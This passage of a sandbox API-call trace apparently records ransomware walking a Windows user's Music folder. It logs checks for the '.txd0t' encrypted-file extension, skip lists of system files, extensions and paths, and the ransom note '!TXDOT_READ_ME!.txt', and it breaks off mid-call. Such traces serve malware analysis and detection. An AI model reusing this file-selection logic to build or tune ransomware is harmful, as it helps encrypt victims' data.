ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0129.566] StrCmpW (psz1="OneDrive.lnk", psz2=".") returned 1 [0129.566] StrCmpW (psz1="OneDrive.lnk", psz2="..") returned 1 [0129.566] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0129.566] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0129.566] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links\\", psz2="OneDrive.lnk", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk") returned="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" [0129.566] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0129.566] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="bootsect.bak") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="iconcache.db") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="thumbs.db") returned -1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransomware ") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2=" ransom ") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="debug.txt") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="boot.ini") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="desktop.ini") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="autorun.inf") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="ntuser.dat") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="ntldr") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="ntdetect.com") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="bootfont.bin") returned 1 [0129.566] StrCmpIW (psz1="OneDrive.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.567] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0129.567] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.567] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0129.567] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.567] GetProcessHeap () returned 0xe30000 [0129.567] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.567] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0129.567] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0129.567] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0129.567] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0129.567] StrCmpW (psz1="Music", psz2=".") returned 1 [0129.567] StrCmpW (psz1="Music", psz2="..") returned 1 [0129.567] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.567] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.567] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\boot\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\programdata\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\drivers\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\wsus\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="crypt_detect") returned 0x0 [0129.567] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="cryptolocker") returned 0x0 [0129.568] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="ransomware") returned 0x0 [0129.568] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0129.568] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.568] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music", lpSrch="C:\\Program Files") returned 0x0 [0129.568] GetProcessHeap () returned 0xe30000 [0129.568] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed39f8 [0129.568] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.568] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\*") returned="C:\\Users\\FD1HVy\\Music\\*" [0129.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.568] StrCmpW (psz1=".", psz2=".") returned 0 [0129.568] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.568] StrCmpW (psz1="..", psz2=".") returned 1 [0129.568] StrCmpW (psz1="..", psz2="..") returned 0 [0129.568] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.568] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.568] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.568] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.568] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.568] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt" [0129.568] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.568] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.568] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.569] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.569] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26955360, ftCreationTime.dwHighDateTime=0x1d5ebeb, ftLastAccessTime.dwLowDateTime=0x211fab0, ftLastAccessTime.dwHighDateTime=0x1d5e435, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10af4, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="33TPGnDT5IeW5L2R8Q.wav.txd0t", cAlternateFileName="33TPGN~1.TXD")) returned 1 [0129.569] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2=".") returned 1 [0129.569] StrCmpW (psz1="33TPGnDT5IeW5L2R8Q.wav.txd0t", psz2="..") returned 1 [0129.569] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.569] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.569] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="33TPGnDT5IeW5L2R8Q.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t" [0129.569] PathFindExtensionW (pszPath="33TPGnDT5IeW5L2R8Q.wav.txd0t") returned=".txd0t" [0129.569] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.569] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.569] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.569] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.569] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="ESQxTLKmutc", cAlternateFileName="ESQXTL~1")) returned 1 [0129.569] StrCmpW (psz1="ESQxTLKmutc", psz2=".") returned 1 [0129.569] StrCmpW (psz1="ESQxTLKmutc", psz2="..") returned 1 [0129.569] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.569] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.569] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="ESQxTLKmutc", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system32\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\system\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\local\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\boot\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\perflogs\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\programdata\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\drivers\\") returned 0x0 [0129.569] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\wsus\\") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="crypt_detect") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="cryptolocker") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="ransomware") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\WINDOWS") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.570] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", lpSrch="C:\\Program Files") returned 0x0 [0129.570] GetProcessHeap () returned 0xe30000 [0129.570] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xed90d0 [0129.570] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.570] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*" [0129.570] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.570] StrCmpW (psz1=".", psz2=".") returned 0 [0129.570] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.570] StrCmpW (psz1="..", psz2=".") returned 1 [0129.570] StrCmpW (psz1="..", psz2="..") returned 0 [0129.570] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c0731b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.570] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.570] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.570] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.570] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0129.570] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt" [0129.570] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.570] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.570] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.570] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.570] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.571] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.571] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="OAdJkPb-", cAlternateFileName="")) returned 1 [0129.571] StrCmpW (psz1="OAdJkPb-", psz2=".") returned 1 [0129.571] StrCmpW (psz1="OAdJkPb-", psz2="..") returned 1 [0129.571] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.571] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0129.571] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="OAdJkPb-", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system32\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\local\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.571] StrStrIW 